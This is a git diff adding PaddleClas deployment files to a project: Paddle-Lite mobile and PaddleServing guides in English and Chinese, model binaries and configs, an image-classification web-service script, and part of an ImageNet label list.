| +| --param_file | Path to the net weight files of PaddlePaddle model (combined) to be optimized. | +| --optimize_out_type | Type of output model, `protobuf` by default. Supports `protobuf` and `naive_buffer` . Compared with `protobuf`, you can use`naive_buffer` to get a more lightweight serialization/deserialization model. If you need to predict on the mobile-side, please set it to `naive_buffer`. | +| --optimize_out | Path to output model, not needed to add `.nb` suffix. | +| --valid_targets | The executable backend of the model, `arm` by default. Supports one or some of `x86` , `arm` , `opencl` , `npu` , `xpu`. If set more than one, please separate the options by space, and the `opt` tool will choose the best way automatically. If need to support Huawei NPU (DaVinci core carried by Kirin 810/990 SoC), please set it to `npu arm` . | +| --record_tailoring_info | Whether to enable `Cut the Library Files According To the Model` , `false` by default. If need to record kernel and OP infos of optimized model, please set it to `true`. | + +In addition, you can run `paddle_lite_opt` to get more detailed information about how to use. + +### 4.2 Compile Paddle-Lite to generate `opt` tool + +Optimizing model requires Paddle-Lite's `opt` executable file, which can be obtained by compiling the Paddle-Lite. The steps are as follows: + +```shell +# get the Paddle-Lite source code, if have gotten , please skip +git clone https://github.com/PaddlePaddle/Paddle-Lite.git +cd Paddle-Lite +git checkout develop +# compile +./lite/tools/build.sh build_optimize_tool +``` + +After the compilation is complete, the `opt` file is located under `build.opt/lite/api/`. + +`opt` tool is used in the same way as `paddle_lite_opt` , please refer to [4.1](#4.1). 
+ + + +### 4.3 Demo of getting the optimized model + +Taking the `MobileNetV3_large_x1_0` model of PaddleClas as an example, we will introduce how to use `paddle_lite_opt` to complete the conversion from the pre-trained model to the inference model, and then to the Paddle-Lite optimized model. + +```shell +# enter PaddleClas root directory +cd PaddleClas_root_path + +# download and uncompress the inference model +wget https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/inference/MobileNetV3_large_x1_0_infer.tar +tar -xf MobileNetV3_large_x1_0_infer.tar + + +# convert inference model to Paddle-Lite optimized model +paddle_lite_opt --model_file=./MobileNetV3_large_x1_0_infer/inference.pdmodel --param_file=./MobileNetV3_large_x1_0_infer/inference.pdiparams --optimize_out=./MobileNetV3_large_x1_0 +``` + +When the above code command is completed, there will be `MobileNetV3_large_x1_0.nb` in the current directory, which is the converted model file. + +## 5. Run optimized model on Phone + +1. Prepare an Android phone with `arm8`. If the compiled inference library and `opt` file are `armv7`, you need an `arm7` phone and modify `ARM_ABI = arm7` in the Makefile. + +2. Install the ADB tool on the computer. + + * Install ADB for MAC + + We recommend using Homebrew to install it. + + ```shell + brew cask install android-platform-tools + ``` + * Install ADB for Linux + + ```shell + sudo apt update + sudo apt install -y wget adb + ``` + * Install ADB for Windows + To install ADB for Windows, you need to download it from Google's Android platform: [Download Link](https://developer.android.com/studio). + + First, make sure the phone is connected to the computer, turn on the `USB debugging` option of the phone, and select the `file transfer` mode. Verify whether ADB is installed successfully as follows: + + ```shell + $ adb devices + + List of devices attached + 744be294 device + ``` + + If there is `device` output like the above, it means the installation was successful. + +4. 
Prepare optimized model, inference library files, test image and dictionary file used. + +```shell +cd PaddleClas_root_path +cd deploy/lite/ + +# prepare.sh will put the inference library files, the test image and the dictionary files in demo/cxx/clas +sh prepare.sh /{lite inference library path}/inference_lite_lib.android.armv8 + +# enter the working directory of lite demo +cd /{lite inference library path}/inference_lite_lib.android.armv8/ +cd demo/cxx/clas/ + +# copy the C++ inference dynamic library file (ie. .so) to the debug folder +cp ../../../cxx/lib/libpaddle_light_api_shared.so ./debug/ +``` + +The `prepare.sh` take `PaddleClas/deploy/lite/imgs/tabby_cat.jpg` as the test image, and copy it to the `demo/cxx/clas/debug/` directory. + +You should put the model that optimized by `paddle_lite_opt` under the `demo/cxx/clas/debug/` directory. In this example, use `MobileNetV3_large_x1_0.nb` model file generated in [2.1.3](#4.3). + +The structure of the clas demo is as follows after the above command is completed: + +``` +demo/cxx/clas/ +|-- debug/ +| |--MobileNetV3_large_x1_0.nb class model +| |--tabby_cat.jpg test image +| |--imagenet1k_label_list.txt dictionary file +| |--libpaddle_light_api_shared.so C++ .so file +| |--config.txt config file +|-- config.txt config file +|-- image_classfication.cpp source code +|-- Makefile compile file +``` + +**NOTE**: + +* `Imagenet1k_label_list.txt` is the category mapping file of the `ImageNet1k` dataset. If use a custom category, you need to replace the category mapping file. +* `config.txt` contains the hyperparameters, as follows: + +```shell +clas_model_file ./MobileNetV3_large_x1_0.nb # path of model file +label_path ./imagenet1k_label_list.txt # path of category mapping file +resize_short_size 256 # the short side length after resize +crop_size 224 # side length used for inference after cropping + +visualize 0 # whether to visualize. 
If you set it to 1, an image file named 'clas_result.png' will be generated in the current directory. +``` + +5. Run Model on Phone + +```shell +# run compile to get the executable file 'clas_system' +make -j + +# move the compiled executable file to the debug folder +mv clas_system ./debug/ + +# push the debug folder to Phone +adb push debug /data/local/tmp/ + +adb shell +cd /data/local/tmp/debug +export LD_LIBRARY_PATH=/data/local/tmp/debug:$LD_LIBRARY_PATH + +# the usage of clas_system is as follows: +# ./clas_system "path of config file" "path of test image" +./clas_system ./config.txt ./tabby_cat.jpg +``` + +**NOTE**: If you make changes to the code, you need to recompile and repush the `debug ` folder to the phone. + +The result is as follows: + +
+ +
+ + + +## FAQ + +Q1:If I want to change the model, do I need to go through the all process again? +A1:If you have completed the above steps, you only need to replace the `.nb` model file after replacing the model. At the same time, you may need to modify the path of `.nb` file in the config file and change the category mapping file to be compatible the model . + +Q2:How to change the test picture? +A2:Replace the test image under debug folder with the image you want to test,and then repush to the Phone again. diff --git a/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer/.tar b/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer/.tar new file mode 100644 index 0000000..ffc2b9f Binary files /dev/null and b/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer/.tar differ diff --git a/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer/inference.pdiparams b/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer/inference.pdiparams new file mode 100644 index 0000000..014e7c2 Binary files /dev/null and b/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer/inference.pdiparams differ diff --git a/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer/inference.pdiparams.info b/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer/inference.pdiparams.info new file mode 100644 index 0000000..4b645bf Binary files /dev/null and b/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer/inference.pdiparams.info differ diff --git a/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer/inference.pdmodel b/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer/inference.pdmodel new file mode 100644 index 0000000..a444c2d Binary files /dev/null and 
b/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer/inference.pdmodel differ diff --git a/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer.zip b/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer.zip new file mode 100644 index 0000000..bf9e9b8 Binary files /dev/null and b/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer.zip differ diff --git a/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer/infer_cfg.yml b/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer/infer_cfg.yml new file mode 100644 index 0000000..42f78c0 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer/infer_cfg.yml @@ -0,0 +1,28 @@ +mode: fluid +draw_threshold: 0.5 +metric: COCO +use_dynamic_shape: false +arch: PicoDet +min_subgraph_size: 3 +Preprocess: +- interp: 2 + keep_ratio: false + target_size: + - 416 + - 416 + type: Resize +- is_scale: true + mean: + - 0.485 + - 0.456 + - 0.406 + std: + - 0.229 + - 0.224 + - 0.225 + type: NormalizeImage +- type: Permute +- stride: 32 + type: PadStride +label_list: +- foreground diff --git a/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer/inference.pdiparams b/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer/inference.pdiparams new file mode 100644 index 0000000..9d74bb0 Binary files /dev/null and b/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer/inference.pdiparams differ diff --git a/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer/inference.pdiparams.info b/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer/inference.pdiparams.info new file mode 100644 index 0000000..401c11d Binary files /dev/null and 
b/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer/inference.pdiparams.info differ diff --git a/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer/inference.pdmodel b/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer/inference.pdmodel new file mode 100644 index 0000000..544cbcd Binary files /dev/null and b/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer/inference.pdmodel differ diff --git a/Smart_container/PaddleClas/deploy/paddleserving/README.md b/Smart_container/PaddleClas/deploy/paddleserving/README.md new file mode 100644 index 0000000..bb34b12 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/paddleserving/README.md @@ -0,0 +1,172 @@ +# PaddleClas Pipeline WebService + +(English|[简体中文](./README_CN.md)) + +PaddleClas provides two service deployment methods: +- Based on **PaddleHub Serving**: Code path is "`./deploy/hubserving`". Please refer to the [tutorial](../../deploy/hubserving/readme_en.md) +- Based on **PaddleServing**: Code path is "`./deploy/paddleserving`". If you prefer a retrieval-based image recognition service, please refer to the [tutorial](./recognition/README.md); if you'd like an image classification service, please follow this tutorial. + +# Image Classification Service deployment based on PaddleServing + +This document will introduce how to use the [PaddleServing](https://github.com/PaddlePaddle/Serving/blob/develop/README.md) to deploy the ResNet50_vd model as a pipeline online service. + +Some Key Features of Paddle Serving: +- Integrate with Paddle training pipeline seamlessly, most paddle models can be deployed with one-line command. +- Industrial serving features supported, such as model management, online loading, online A/B testing etc. +- Highly concurrent and efficient communication between clients and servers supported. 
+ +The introduction and tutorial of Paddle Serving service deployment framework reference [document](https://github.com/PaddlePaddle/Serving/blob/develop/README.md). + + +## Contents +- [Environmental preparation](#environmental-preparation) +- [Model conversion](#model-conversion) +- [Paddle Serving pipeline deployment](#paddle-serving-pipeline-deployment) +- [FAQ](#faq) + + +## Environmental preparation + +PaddleClas operating environment and PaddleServing operating environment are needed. + +1. Please prepare PaddleClas operating environment reference [link](../../docs/zh_CN/tutorials/install.md). + Download the corresponding paddle whl package according to the environment, it is recommended to install version 2.1.0. + +2. The steps of PaddleServing operating environment prepare are as follows: + + Install serving which used to start the service + ``` + pip3 install paddle-serving-server==0.6.1 # for CPU + pip3 install paddle-serving-server-gpu==0.6.1 # for GPU + # Other GPU environments need to confirm the environment and then choose to execute the following commands + pip3 install paddle-serving-server-gpu==0.6.1.post101 # GPU with CUDA10.1 + TensorRT6 + pip3 install paddle-serving-server-gpu==0.6.1.post11 # GPU with CUDA11 + TensorRT7 + ``` + +3. Install the client to send requests to the service + In [download link](https://github.com/PaddlePaddle/Serving/blob/develop/doc/LATEST_PACKAGES.md) find the client installation package corresponding to the python version. + The python3.7 version is recommended here: + + ``` + wget https://paddle-serving.bj.bcebos.com/test-dev/whl/paddle_serving_client-0.0.0-cp37-none-any.whl + pip3 install paddle_serving_client-0.0.0-cp37-none-any.whl + ``` + +4. Install serving-app + ``` + pip3 install paddle-serving-app==0.6.1 + ``` + + **note:** If you want to install the latest version of PaddleServing, refer to [link](https://github.com/PaddlePaddle/Serving/blob/develop/doc/LATEST_PACKAGES.md). 
+ + + +## Model conversion +When using PaddleServing for service deployment, you need to convert the saved inference model into a serving model that is easy to deploy. + +Firstly, download the inference model of ResNet50_vd +``` +# Download and unzip the ResNet50_vd model +wget https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/inference/ResNet50_vd_infer.tar && tar xf ResNet50_vd_infer.tar +``` + +Then, you can use the installed paddle_serving_client tool to convert the inference model to a serving model. +``` +# ResNet50_vd model conversion +python3 -m paddle_serving_client.convert --dirname ./ResNet50_vd_infer/ \ + --model_filename inference.pdmodel \ + --params_filename inference.pdiparams \ + --serving_server ./ResNet50_vd_serving/ \ + --serving_client ./ResNet50_vd_client/ +``` + +After the ResNet50_vd inference model is converted, there will be additional folders of `ResNet50_vd_serving` and `ResNet50_vd_client` in the current folder, with the following format: +``` +|- ResNet50_vd_serving/ + |- __model__ + |- __params__ + |- serving_server_conf.prototxt + |- serving_server_conf.stream.prototxt + +|- ResNet50_vd_client + |- serving_client_conf.prototxt + |- serving_client_conf.stream.prototxt +``` + +Once you have the model file for deployment, you need to change the alias name in `serving_server_conf.prototxt`: Change `alias_name` in `feed_var` to `image`, change `alias_name` in `fetch_var` to `prediction`. +The modified serving_server_conf.prototxt file is as follows: +``` +feed_var { + name: "inputs" + alias_name: "image" + is_lod_tensor: false + feed_type: 1 + shape: 3 + shape: 224 + shape: 224 +} +fetch_var { + name: "save_infer_model/scale_0.tmp_1" + alias_name: "prediction" + is_lod_tensor: true + fetch_type: 1 + shape: -1 +} +``` + + +## Paddle Serving pipeline deployment + +1. Download the PaddleClas code, if you have already downloaded it, you can skip this step. 
+ ``` + git clone https://github.com/PaddlePaddle/PaddleClas + + # Enter the working directory + cd PaddleClas/deploy/paddleserving/ + ``` + + The paddleserving directory contains the code to start the pipeline service and send prediction requests, including: + ``` + __init__.py + config.yml # configuration file of starting the service + pipeline_http_client.py # script to send pipeline prediction request by http + pipeline_rpc_client.py # script to send pipeline prediction request by rpc + classification_web_service.py # start the script of the pipeline server + ``` + +2. Run the following command to start the service. + ``` + # Start the service and save the running log in log.txt + python3 classification_web_service.py &>log.txt & + ``` + After the service is successfully started, a log similar to the following will be printed in log.txt + ![](./imgs/start_server.png) + +3. Send service request + ``` + python3 pipeline_http_client.py + ``` + After successfully running, the predicted result of the model will be printed in the cmd window. An example of the result is: + ![](./imgs/results.png) + + Adjust the number of concurrency in config.yml to get the largest QPS. + + ``` + op: + concurrency: 8 + ... + ``` + + Multiple service requests can be sent at the same time if necessary. + + The predicted performance data will be automatically written into the `PipelineServingLogs/pipeline.tracer` file. + + +## FAQ +**Q1**: No result return after sending the request. + +**A1**: Do not set the proxy when starting the service and sending the request. You can close the proxy before starting the service and before sending the request. 
The command to close the proxy is: +``` +unset https_proxy +unset http_proxy +``` diff --git a/Smart_container/PaddleClas/deploy/paddleserving/README_CN.md b/Smart_container/PaddleClas/deploy/paddleserving/README_CN.md new file mode 100644 index 0000000..b0222d2 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/paddleserving/README_CN.md @@ -0,0 +1,170 @@ +# PaddleClas 服务化部署 + +([English](./README.md)|简体中文) + +PaddleClas提供2种服务部署方式: +- 基于PaddleHub Serving的部署:代码路径为"`./deploy/hubserving`",使用方法参考[文档](../../deploy/hubserving/readme.md); +- 基于PaddleServing的部署:代码路径为"`./deploy/paddleserving`", 基于检索方式的图像识别服务参考[文档](./recognition/README_CN.md), 图像分类服务按照本教程使用。 + +# 基于PaddleServing的图像分类服务部署 + +本文档以经典的ResNet50_vd模型为例,介绍如何使用[PaddleServing](https://github.com/PaddlePaddle/Serving/blob/develop/README_CN.md)工具部署PaddleClas +动态图模型的pipeline在线服务。 + +相比较于hubserving部署,PaddleServing具备以下优点: +- 支持客户端和服务端之间高并发和高效通信 +- 支持 工业级的服务能力 例如模型管理,在线加载,在线A/B测试等 +- 支持 多种编程语言 开发客户端,例如C++, Python和Java + +更多有关PaddleServing服务化部署框架介绍和使用教程参考[文档](https://github.com/PaddlePaddle/Serving/blob/develop/README_CN.md)。 + +## 目录 +- [PaddleClas 服务化部署](#paddleclas-服务化部署) +- [基于PaddleServing的图像分类服务部署](#基于paddleserving的图像分类服务部署) + - [目录](#目录) + - [环境准备](#环境准备) + - [模型转换](#模型转换) + - [Paddle Serving pipeline部署](#paddle-serving-pipeline部署) + - [FAQ](#faq) + + +## 环境准备 + +需要准备PaddleClas的运行环境和PaddleServing的运行环境。 + +- 准备PaddleClas的[运行环境](../../docs/zh_CN/tutorials/install.md), 根据环境下载对应的paddle whl包,推荐安装2.1.0版本 + +- 准备PaddleServing的运行环境,步骤如下 + +1. 安装serving,用于启动服务 + ``` + pip3 install paddle-serving-server==0.6.1 # for CPU + pip3 install paddle-serving-server-gpu==0.6.1 # for GPU + # 其他GPU环境需要确认环境再选择执行如下命令 + pip3 install paddle-serving-server-gpu==0.6.1.post101 # GPU with CUDA10.1 + TensorRT6 + pip3 install paddle-serving-server-gpu==0.6.1.post11 # GPU with CUDA11 + TensorRT7 + ``` + +2. 
安装client,用于向服务发送请求 + 在[下载链接](https://github.com/PaddlePaddle/Serving/blob/develop/doc/LATEST_PACKAGES.md)中找到对应python版本的client安装包,这里推荐python3.7版本: + + ``` + wget https://paddle-serving.bj.bcebos.com/test-dev/whl/paddle_serving_client-0.0.0-cp37-none-any.whl + pip3 install paddle_serving_client-0.0.0-cp37-none-any.whl + ``` + +3. 安装serving-app + ``` + pip3 install paddle-serving-app==0.6.1 + ``` + **Note:** 如果要安装最新版本的PaddleServing参考[链接](https://github.com/PaddlePaddle/Serving/blob/develop/doc/LATEST_PACKAGES.md)。 + + +## 模型转换 + +使用PaddleServing做服务化部署时,需要将保存的inference模型转换为serving易于部署的模型。 + +首先,下载ResNet50_vd的inference模型 +``` +# 下载并解压ResNet50_vd模型 +wget https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/inference/ResNet50_vd_infer.tar && tar xf ResNet50_vd_infer.tar +``` + +接下来,用安装的paddle_serving_client把下载的inference模型转换成易于server部署的模型格式。 + +``` +# 转换ResNet50_vd模型 +python3 -m paddle_serving_client.convert --dirname ./ResNet50_vd_infer/ \ + --model_filename inference.pdmodel \ + --params_filename inference.pdiparams \ + --serving_server ./ResNet50_vd_serving/ \ + --serving_client ./ResNet50_vd_client/ +``` +ResNet50_vd推理模型转换完成后,会在当前文件夹多出`ResNet50_vd_serving` 和`ResNet50_vd_client`的文件夹,具备如下格式: +``` +|- ResNet50_vd_serving/ + |- __model__ + |- __params__ + |- serving_server_conf.prototxt + |- serving_server_conf.stream.prototxt + +|- ResNet50_vd_client + |- serving_client_conf.prototxt + |- serving_client_conf.stream.prototxt + +``` +得到模型文件之后,需要修改serving_server_conf.prototxt中的alias名字: 将`feed_var`中的`alias_name`改为`image`, 将`fetch_var`中的`alias_name`改为`prediction`。 +修改后的serving_server_conf.prototxt内容如下: +``` +feed_var { + name: "inputs" + alias_name: "image" + is_lod_tensor: false + feed_type: 1 + shape: 3 + shape: 224 + shape: 224 +} +fetch_var { + name: "save_infer_model/scale_0.tmp_1" + alias_name: "prediction" + is_lod_tensor: true + fetch_type: 1 + shape: -1 +} +``` + + +## Paddle Serving pipeline部署 + +1. 
下载PaddleClas代码,若已下载可跳过此步骤 + ``` + git clone https://github.com/PaddlePaddle/PaddleClas + + # 进入到工作目录 + cd PaddleClas/deploy/paddleserving/ + ``` + paddleserving目录包含启动pipeline服务和发送预测请求的代码,包括: + ``` + __init__.py + config.yml # 启动服务的配置文件 + pipeline_http_client.py # http方式发送pipeline预测请求的脚本 + pipeline_rpc_client.py # rpc方式发送pipeline预测请求的脚本 + classification_web_service.py # 启动pipeline服务端的脚本 + ``` + +2. 启动服务可运行如下命令: + ``` + # 启动服务,运行日志保存在log.txt + python3 classification_web_service.py &>log.txt & + ``` + 成功启动服务后,log.txt中会打印类似如下日志 + ![](./imgs/start_server.png) + +3. 发送服务请求: + ``` + python3 pipeline_http_client.py + ``` + 成功运行后,模型预测的结果会打印在cmd窗口中,结果示例为: + ![](./imgs/results.png) + + 调整 config.yml 中的并发个数可以获得最大的QPS + ``` + op: + #并发数,is_thread_op=True时,为线程并发;否则为进程并发 + concurrency: 8 + ... + ``` + 有需要的话可以同时发送多个服务请求 + + 预测性能数据会被自动写入 `PipelineServingLogs/pipeline.tracer` 文件中。 + + +## FAQ +**Q1**: 发送请求后没有结果返回或者提示输出解码报错 + +**A1**: 启动服务和发送请求时不要设置代理,可以在启动服务前和发送请求前关闭代理,关闭代理的命令是: +``` +unset https_proxy +unset http_proxy +``` diff --git a/Smart_container/PaddleClas/deploy/paddleserving/__init__.py b/Smart_container/PaddleClas/deploy/paddleserving/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/Smart_container/PaddleClas/deploy/paddleserving/classification_web_service.py b/Smart_container/PaddleClas/deploy/paddleserving/classification_web_service.py new file mode 100644 index 0000000..6c353eb --- /dev/null +++ b/Smart_container/PaddleClas/deploy/paddleserving/classification_web_service.py @@ -0,0 +1,73 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. 
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
from paddle_serving_app.reader import Sequential, URL2Image, Resize, CenterCrop, RGB2BGR, Transpose, Div, Normalize, Base64ToImage
try:
    from paddle_serving_server_gpu.web_service import WebService, Op
except ImportError:
    from paddle_serving_server.web_service import WebService, Op
import logging
import numpy as np
import base64, cv2


class ImagenetOp(Op):
    """Pipeline op that decodes base64-encoded images, preprocesses them for
    the ResNet50_vd classifier, and maps the model's scores to ImageNet labels.
    """

    def init_op(self):
        """One-time setup: build the preprocessing pipeline and load labels."""
        # Resize/center-crop to 224x224, reorder channels, scale to [0, 1]
        # and normalize with ImageNet mean/std (channel-first after Transpose).
        self.seq = Sequential([
            Resize(256), CenterCrop(224), RGB2BGR(), Transpose((2, 0, 1)),
            Div(255), Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225],
                                True)
        ])
        # Map class index -> label text; "imagenet.label" has one label per
        # line, line order defines the class index.
        self.label_dict = {}
        label_idx = 0
        with open("imagenet.label") as fin:
            for line in fin:
                self.label_dict[label_idx] = line.strip()
                label_idx += 1

    def preprocess(self, input_dicts, data_id, log_id):
        """Decode every base64 image in the request and stack them into one
        batched float array keyed by the model's "image" feed alias.
        """
        (_, input_dict), = input_dicts.items()
        imgs = []
        for key in input_dict.keys():
            data = base64.b64decode(input_dict[key].encode('utf8'))
            # np.frombuffer replaces np.fromstring, which is deprecated and
            # was removed in NumPy 2.0.
            data = np.frombuffer(data, np.uint8)
            im = cv2.imdecode(data, cv2.IMREAD_COLOR)
            img = self.seq(im)
            # copy(): frombuffer returns a read-only view of the decode buffer.
            imgs.append(img[np.newaxis, :].copy())
        input_imgs = np.concatenate(imgs, axis=0)
        return {"image": input_imgs}, False, None, ""

    def postprocess(self, input_dicts, fetch_dict, log_id):
        """Turn the raw score matrix (alias "prediction") into top-1 label and
        probability strings, one entry per image in the batch.
        """
        score_list = fetch_dict["prediction"]
        result = {"label": [], "prob": []}
        for score in score_list:
            score = score.tolist()
            max_score = max(score)
            # Strip trailing commas so the label reads cleanly in the response.
            result["label"].append(self.label_dict[score.index(max_score)]
                                   .strip().replace(",", ""))
            result["prob"].append(max_score)
        # The pipeline response transports values as strings.
        result["label"] = str(result["label"])
        result["prob"] = str(result["prob"])
        return result, None, ""


class ImageService(WebService):
    """Web service whose DAG is a single ImagenetOp fed by the read op."""

    def get_pipeline_response(self, read_op):
        image_op = ImagenetOp(name="imagenet", input_ops=[read_op])
        return image_op


# Start the pipeline server using ports/devices declared in config.yml.
uci_service = ImageService(name="imagenet")
uci_service.prepare_pipeline_config("config.yml")
uci_service.run_service()
--git a/Smart_container/PaddleClas/deploy/paddleserving/daisy.jpg b/Smart_container/PaddleClas/deploy/paddleserving/daisy.jpg new file mode 100644 index 0000000..7edeca6 Binary files /dev/null and b/Smart_container/PaddleClas/deploy/paddleserving/daisy.jpg differ diff --git a/Smart_container/PaddleClas/deploy/paddleserving/imagenet.label b/Smart_container/PaddleClas/deploy/paddleserving/imagenet.label new file mode 100644 index 0000000..d714673 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/paddleserving/imagenet.label @@ -0,0 +1,1000 @@ +tench, Tinca tinca, +goldfish, Carassius auratus, +great white shark, white shark, man-eater, man-eating shark, Carcharodon carcharias, +tiger shark, Galeocerdo cuvieri, +hammerhead, hammerhead shark, +electric ray, crampfish, numbfish, torpedo, +stingray, +cock, +hen, +ostrich, Struthio camelus, +brambling, Fringilla montifringilla, +goldfinch, Carduelis carduelis, +house finch, linnet, Carpodacus mexicanus, +junco, snowbird, +indigo bunting, indigo finch, indigo bird, Passerina cyanea, +robin, American robin, Turdus migratorius, +bulbul, +jay, +magpie, +chickadee, +water ouzel, dipper, +kite, +bald eagle, American eagle, Haliaeetus leucocephalus, +vulture, +great grey owl, great gray owl, Strix nebulosa, +European fire salamander, Salamandra salamandra, +common newt, Triturus vulgaris, +eft, +spotted salamander, Ambystoma maculatum, +axolotl, mud puppy, Ambystoma mexicanum, +bullfrog, Rana catesbeiana, +tree frog, tree-frog, +tailed frog, bell toad, ribbed toad, tailed toad, Ascaphus trui, +loggerhead, loggerhead turtle, Caretta caretta, +leatherback turtle, leatherback, leathery turtle, Dermochelys coriacea, +mud turtle, +terrapin, +box turtle, box tortoise, +banded gecko, +common iguana, iguana, Iguana iguana, +American chameleon, anole, Anolis carolinensis, +whiptail, whiptail lizard, +agama, +frilled lizard, Chlamydosaurus kingi, +alligator lizard, +Gila monster, Heloderma suspectum, +green lizard, Lacerta viridis, 
+African chameleon, Chamaeleo chamaeleon, +Komodo dragon, Komodo lizard, dragon lizard, giant lizard, Varanus komodoensis, +African crocodile, Nile crocodile, Crocodylus niloticus, +American alligator, Alligator mississipiensis, +triceratops, +thunder snake, worm snake, Carphophis amoenus, +ringneck snake, ring-necked snake, ring snake, +hognose snake, puff adder, sand viper, +green snake, grass snake, +king snake, kingsnake, +garter snake, grass snake, +water snake, +vine snake, +night snake, Hypsiglena torquata, +boa constrictor, Constrictor constrictor, +rock python, rock snake, Python sebae, +Indian cobra, Naja naja, +green mamba, +sea snake, +horned viper, cerastes, sand viper, horned asp, Cerastes cornutus, +diamondback, diamondback rattlesnake, Crotalus adamanteus, +sidewinder, horned rattlesnake, Crotalus cerastes, +trilobite, +harvestman, daddy longlegs, Phalangium opilio, +scorpion, +black and gold garden spider, Argiope aurantia, +barn spider, Araneus cavaticus, +garden spider, Aranea diademata, +black widow, Latrodectus mactans, +tarantula, +wolf spider, hunting spider, +tick, +centipede, +black grouse, +ptarmigan, +ruffed grouse, partridge, Bonasa umbellus, +prairie chicken, prairie grouse, prairie fowl, +peacock, +quail, +partridge, +African grey, African gray, Psittacus erithacus, +macaw, +sulphur-crested cockatoo, Kakatoe galerita, Cacatua galerita, +lorikeet, +coucal, +bee eater, +hornbill, +hummingbird, +jacamar, +toucan, +drake, +red-breasted merganser, Mergus serrator, +goose, +black swan, Cygnus atratus, +tusker, +echidna, spiny anteater, anteater, +platypus, duckbill, duckbilled platypus, duck-billed platypus, Ornithorhynchus anatinus, +wallaby, brush kangaroo, +koala, koala bear, kangaroo bear, native bear, Phascolarctos cinereus, +wombat, +jellyfish, +sea anemone, anemone, +brain coral, +flatworm, platyhelminth, +nematode, nematode worm, roundworm, +conch, +snail, +slug, +sea slug, nudibranch, +chiton, coat-of-mail shell, sea cradle, 
polyplacophore, +chambered nautilus, pearly nautilus, nautilus, +Dungeness crab, Cancer magister, +rock crab, Cancer irroratus, +fiddler crab, +king crab, Alaska crab, Alaskan king crab, Alaska king crab, Paralithodes camtschatica, +American lobster, Northern lobster, Maine lobster, Homarus americanus, +spiny lobster, langouste, rock lobster, crawfish, crayfish, sea crawfish, +crayfish, crawfish, crawdad, crawdaddy, +hermit crab, +isopod, +white stork, Ciconia ciconia, +black stork, Ciconia nigra, +spoonbill, +flamingo, +little blue heron, Egretta caerulea, +American egret, great white heron, Egretta albus, +bittern, +crane, +limpkin, Aramus pictus, +European gallinule, Porphyrio porphyrio, +American coot, marsh hen, mud hen, water hen, Fulica americana, +bustard, +ruddy turnstone, Arenaria interpres, +red-backed sandpiper, dunlin, Erolia alpina, +redshank, Tringa totanus, +dowitcher, +oystercatcher, oyster catcher, +pelican, +king penguin, Aptenodytes patagonica, +albatross, mollymawk, +grey whale, gray whale, devilfish, Eschrichtius gibbosus, Eschrichtius robustus, +killer whale, killer, orca, grampus, sea wolf, Orcinus orca, +dugong, Dugong dugon, +sea lion, +Chihuahua, +Japanese spaniel, +Maltese dog, Maltese terrier, Maltese, +Pekinese, Pekingese, Peke, +Shih-Tzu, +Blenheim spaniel, +papillon, +toy terrier, +Rhodesian ridgeback, +Afghan hound, Afghan, +basset, basset hound, +beagle, +bloodhound, sleuthhound, +bluetick, +black-and-tan coonhound, +Walker hound, Walker foxhound, +English foxhound, +redbone, +borzoi, Russian wolfhound, +Irish wolfhound, +Italian greyhound, +whippet, +Ibizan hound, Ibizan Podenco, +Norwegian elkhound, elkhound, +otterhound, otter hound, +Saluki, gazelle hound, +Scottish deerhound, deerhound, +Weimaraner, 